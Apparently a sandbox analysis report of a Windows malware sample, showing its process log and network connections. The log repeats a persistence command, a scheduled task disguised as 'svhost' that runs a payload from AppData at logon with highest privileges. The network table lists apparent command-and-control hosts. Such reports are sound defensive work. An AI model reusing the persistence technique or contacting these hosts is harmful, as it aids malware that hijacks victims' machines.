C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3Fo20fTK85ag.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lrXyDBNHmtdJ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R1z0ZmsYGalf.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9C1iIDtQYD4v.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hrGDg1AdV9OK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yGtTBl8IDJUr.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CVu3plBkcgHb.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y8jXTGhQlJpU.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UvyiVeU9Xidk.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6qS3egQJCJ3X.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7AMwXN8qVRSg.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B9TTrNhRDSJK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HMwUzAzaUBqi.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\On7ul4K2gaSD.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1A50sMzEIYcK.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Y2koCnyRPM4L.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xopopnT7TTnk.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V7NP7dTNHOqD.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yxCSlMxH5Npq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Cua0FrzFmDSE.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 49.2.101.151.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| GB | 172.217.169.78:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | 101.208.201.84.in-addr.arpa | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| N/A | 127.0.0.1:49749 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| GB | 163.181.154.182:80 | 1717.1000uc.com | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| CN | 47.98.177.117:8888 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| US | 20.83.148.22:80 | tcp | |
| FR | 176.150.119.15:1155 | tcp | |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| RU | 185.215.113.66:5152 | aefieiaehfiaehr.top | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.66:80 | aefieiaehfiaehr.top | tcp |
| GH | 196.175.1.52:40500 | tcp | |
| UZ | 83.222.7.85:40500 | udp | |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 52.1.175.196.in-addr.arpa | udp |
| CN | 183.57.21.131:8095 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| KZ | 95.59.162.2:40500 | udp | |
| KZ | 2.133.70.66:40500 | udp | |
| SY | 82.137.239.235:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 93.188.80.134:40500 | tcp | |
| IR | 2.176.94.43:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| KZ | 109.166.63.126:40500 | udp | |
| UZ | 217.30.164.185:40500 | udp | |
| GB | 103.192.179.31:80 | 103.192.179.31 | tcp |
| N/A | 127.0.0.1:54026 | tcp | |
| N/A | 127.0.0.1:54033 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| KZ | 178.88.234.149:40500 | udp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:54041 | tcp | |
| N/A | 127.0.0.1:54045 | tcp | |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| HK | 103.135.101.188:1930 | wdearas.liveya.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 104.21.82.174:443 | marshal-zhukov.com | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| KZ | 37.151.73.50:40500 | udp | |
| YE | 134.35.158.149:40500 | tcp | |
| KZ | 2.133.70.66:40500 | udp | |
| YE | 46.35.84.77:40500 | udp | |
| PK | 203.99.184.103:40500 | udp | |
| IR | 5.232.120.72:40500 | udp | |
| US | 8.8.8.8:53 | 72.120.232.5.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.177.144.169:40500 | udp | |
| IR | 151.232.179.149:40500 | tcp | |
| KZ | 37.151.156.118:40500 | udp | |
| UZ | 90.156.160.54:40500 | udp | |
| KZ | 92.46.228.246:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 2.180.115.76:40500 | udp | |
| NE | 41.138.38.164:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 195.158.21.74:40500 | tcp | |
| UZ | 90.156.160.6:40500 | udp | |
| KZ | 178.91.130.114:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 5.63.94.144:40500 | udp | |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| KH | 202.131.82.180:80 | 202.131.82.180 | tcp |
| KZ | 178.89.193.218:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 8.8.8.8:53 | 218.193.89.178.in-addr.arpa | udp |
| IR | 2.190.242.182:40500 | tcp | |
| DE | 37.1.196.35:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 213.230.97.138:40500 | udp | |
| US | 8.8.8.8:53 | 138.97.230.213.in-addr.arpa | udp |
| UZ | 90.156.166.95:40500 | udp | |
| UZ | 90.156.165.87:40500 | udp | |
| IR | 2.176.72.136:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| RU | 80.71.213.158:40500 | udp | |
| IR | 89.43.216.137:40500 | tcp | |
| KZ | 2.135.204.193:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 5.133.123.159:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| EG | 45.243.140.174:40500 | udp | |
| US | 8.8.8.8:53 | 174.140.243.45.in-addr.arpa | udp |
| IR | 151.241.234.162:40500 | udp | |
| IR | 188.212.145.214:40500 | udp | |
| IR | 151.232.164.243:40500 | udp | |
| RU | 92.124.152.236:40500 | tcp | |
| IR | 46.100.164.239:40500 | udp | |
| KG | 212.112.107.11:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 87.237.234.195:40500 | udp | |
| US | 8.8.8.8:53 | 195.234.237.87.in-addr.arpa | udp |
| PK | 124.109.48.132:40500 | udp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| IR | 151.242.27.41:40500 | udp | |
| KZ | 89.218.244.178:40500 | tcp | |
| IR | 2.190.242.182:40500 | udp | |
| DE | 37.1.196.35:80 | tcp | |
| MX | 189.150.7.86:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 89.236.218.158:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| MX | 187.230.224.82:40500 | udp | |
| US | 8.8.8.8:53 | 82.224.230.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 37.151.27.190:40500 | tcp | |
| IR | 2.190.67.184:40500 | udp | |
| IR | 5.232.155.0:40500 | udp | |
| MX | 187.192.185.201:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| BY | 46.56.85.158:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 91.185.146.150:40500 | udp | |
| KZ | 77.240.41.134:40500 | tcp | |
| KZ | 82.200.172.118:40500 | udp | |
| MX | 201.108.200.21:40500 | udp | |
| US | 8.8.8.8:53 | 21.200.108.201.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 46.100.82.131:40500 | udp | |
| RU | 45.150.24.42:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 194.93.26.59:40500 | tcp | |
| KZ | 178.22.172.2:40500 | udp | |
| US | 8.8.8.8:53 | 2.172.22.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 151.242.48.19:40500 | udp | |
| IR | 78.38.107.167:40500 | udp | |
| DE | 37.1.196.35:80 | tcp | |
| IR | 89.37.171.228:40500 | udp | |
| IR | 2.191.61.218:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 213.230.99.119:40500 | udp | |
| RU | 31.23.95.118:40500 | tcp | |
| KZ | 95.59.62.94:40500 | udp | |
| US | 8.8.8.8:53 | 94.62.59.95.in-addr.arpa | udp |
| TJ | 91.218.161.58:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 2.179.117.33:40500 | udp | |
| US | 8.8.8.8:53 | 33.117.179.2.in-addr.arpa | udp |
| SY | 178.253.102.221:40500 | udp | |
| IR | 89.44.147.157:40500 | udp | |
| IR | 128.65.180.156:40500 | tcp | |
| YE | 134.35.203.184:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| KR | 183.109.168.229:40500 | udp | |
| RU | 188.124.116.191:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| RU | 195.190.112.66:40500 | udp | |
| MX | 187.235.157.13:40500 | udp | |
| US | 8.8.8.8:53 | 13.157.235.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 213.230.108.92:40500 | tcp | |
| YE | 134.35.107.95:40500 | udp | |
| IR | 185.123.69.190:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| KZ | 5.63.81.123:40500 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 77.240.41.134:40500 | udp | |
| DE | 37.1.196.35:80 | tcp | |
| KZ | 95.59.33.46:40500 | tcp | |
| RU | 178.67.165.88:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| RU | 92.124.152.236:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 151.243.58.90:40500 | udp | |
| UZ | 217.30.164.185:40500 | udp | |
| YE | 82.114.186.86:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 2.176.90.19:40500 | tcp | |
| KZ | 89.218.186.142:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 80.250.196.82:40500 | udp | |
| IR | 188.212.88.213:40500 | udp | |
| IR | 89.219.115.156:40500 | tcp | |
| BO | 186.121.229.86:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 87.237.237.93:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| KZ | 213.211.105.70:40500 | udp | |
| DE | 37.1.196.35:80 | tcp | |
| EG | 45.242.17.111:40500 | udp | |
| RO | 37.120.247.128:40500 | tcp | |
| IR | 2.177.228.237:40500 | udp | |
| AF | 149.54.20.134:40500 | tcp | |
| UZ | 86.62.3.67:40500 | udp | |
| KZ | 89.218.238.106:40500 | udp | |
| RU | 93.123.145.179:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| MX | 189.167.22.36:40500 | udp | |
| US | 8.8.8.8:53 | 36.22.167.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 89.236.217.71:40500 | tcp | |
| UZ | 89.236.216.14:40500 | udp | |
| UZ | 213.230.99.184:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 217.30.162.37:40500 | udp | |
| US | 8.8.8.8:53 | 37.162.30.217.in-addr.arpa | udp |
| IR | 93.119.90.81:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.176.109.1:40500 | udp | |
| IR | 46.248.34.105:40500 | tcp | |
| MX | 189.167.44.219:40500 | udp | |
| RO | 37.120.247.128:40500 | udp | |
| US | 8.8.8.8:53 | 128.247.120.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 2.181.218.27:40500 | udp | |
| MX | 189.141.139.39:40500 | udp | |
| DE | 37.1.196.35:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| GR | 85.73.234.113:40500 | udp | |
| SY | 178.253.102.214:40500 | tcp | |
| BG | 146.70.53.161:40500 | udp | |
| US | 8.8.8.8:53 | 161.53.70.146.in-addr.arpa | udp |
| RU | 95.29.145.167:40500 | udp | |
| UZ | 90.156.160.30:40500 | udp | |
| US | 8.8.8.8:53 | 30.160.156.90.in-addr.arpa | udp |
| RU | 37.78.33.95:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| UZ | 84.54.71.94:40500 | tcp | |
| MX | 189.164.170.136:40500 | udp | |
| IR | 46.248.34.12:40500 | udp | |
| US | 8.8.8.8:53 | 12.34.248.46.in-addr.arpa | udp |
| UZ | 90.156.164.28:40500 | udp | |
| IR | 93.118.127.143:40500 | udp | |
| UZ | 89.236.219.80:40500 | tcp | |
| KZ | 2.135.121.134:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 90.156.160.25:40500 | udp | |
| YE | 178.130.103.42:40500 | udp | |
| UZ | 217.30.160.219:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 37.1.196.35:80 | tcp | |
| US | 198.163.199.114:40500 | udp | |
| SY | 178.253.109.195:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 90.156.164.120:40500 | udp | |
| EG | 105.197.203.243:40500 | udp | |
| UZ | 89.249.62.87:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.181.206.190:40500 | udp | |
| US | 38.224.37.24:40500 | udp | |
| IR | 5.234.67.61:40500 | tcp | |
| IR | 93.118.99.152:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 194.93.26.59:40500 | udp | |
| IR | 128.65.180.156:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 89.218.238.106:40500 | tcp | |
| UZ | 93.188.86.253:40500 | udp | |
| US | 8.8.8.8:53 | 253.86.188.93.in-addr.arpa | udp |
| DE | 37.1.196.35:80 | tcp | |
| UZ | 90.156.162.5:40500 | udp | |
| IR | 185.80.102.252:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 31.8.228.20:40500 | udp | |
| US | 8.8.8.8:53 | 20.228.8.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| YE | 46.35.79.193:40500 | tcp | |
| IR | 176.67.79.229:40500 | udp | |
| UZ | 89.249.62.92:40500 | udp | |
| US | 8.8.8.8:53 | 92.62.249.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 90.156.166.42:40500 | udp | |
| IR | 94.183.35.46:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.187.40.5:40500 | udp | |
| RU | 78.81.147.173:40500 | udp | |
| IR | 5.235.185.18:40500 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 82.200.169.186:40500 | udp | |
| SY | 82.100.175.13:40500 | udp | |
| US | 8.8.8.8:53 | 13.175.100.82.in-addr.arpa | udp |
| UZ | 89.249.62.14:40500 | udp | |
| UZ | 217.30.162.161:40500 | udp | |
| US | 8.8.8.8:53 | 161.162.30.217.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| KZ | 5.251.234.88:40500 | udp | |
| IR | 2.178.140.117:40500 | tcp | |
| MU | 102.207.195.84:40500 | udp | |
| US | 8.8.8.8:53 | 84.195.207.102.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| DE | 37.1.196.35:80 | tcp | |
| TJ | 176.113.143.77:40500 | udp | |
| SY | 95.212.120.220:40500 | udp | |
| SY | 77.44.228.98:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| UZ | 90.156.161.82:40500 | tcp | |
| UZ | 90.156.163.119:40500 | udp | |
| IR | 188.209.32.217:40500 | udp | |
| KZ | 92.47.52.79:40500 | tcp | |
| RU | 109.173.111.27:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 2.133.45.6:40500 | udp | |
| KZ | 89.218.244.178:40500 | udp | |
| US | 8.8.8.8:53 | 178.244.218.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| YE | 46.161.239.195:40500 | udp | |
| IR | 2.187.89.214:40500 | udp | |
| KZ | 46.36.149.47:40500 | udp | |
| IR | 95.81.102.72:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| GE | 62.212.36.229:40500 | udp | |
| US | 8.8.8.8:53 | 229.36.212.62.in-addr.arpa | udp |
| DE | 37.1.196.35:80 | tcp | |
| EG | 102.189.164.188:40500 | udp | |
| IR | 151.233.61.190:40500 | udp | |
| UZ | 217.30.162.37:40500 | tcp | |
| KZ | 31.171.185.170:40500 | udp | |
| US | 8.8.8.8:53 | 170.185.171.31.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| MX | 187.230.224.189:40500 | udp | |
| US | 8.8.8.8:53 | 189.224.230.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 95.59.234.182:40500 | udp | |
| UZ | 195.158.22.4:40500 | udp | |
| US | 8.8.8.8:53 | 4.22.158.195.in-addr.arpa | udp |
| UZ | 217.30.162.37:40500 | tcp | |
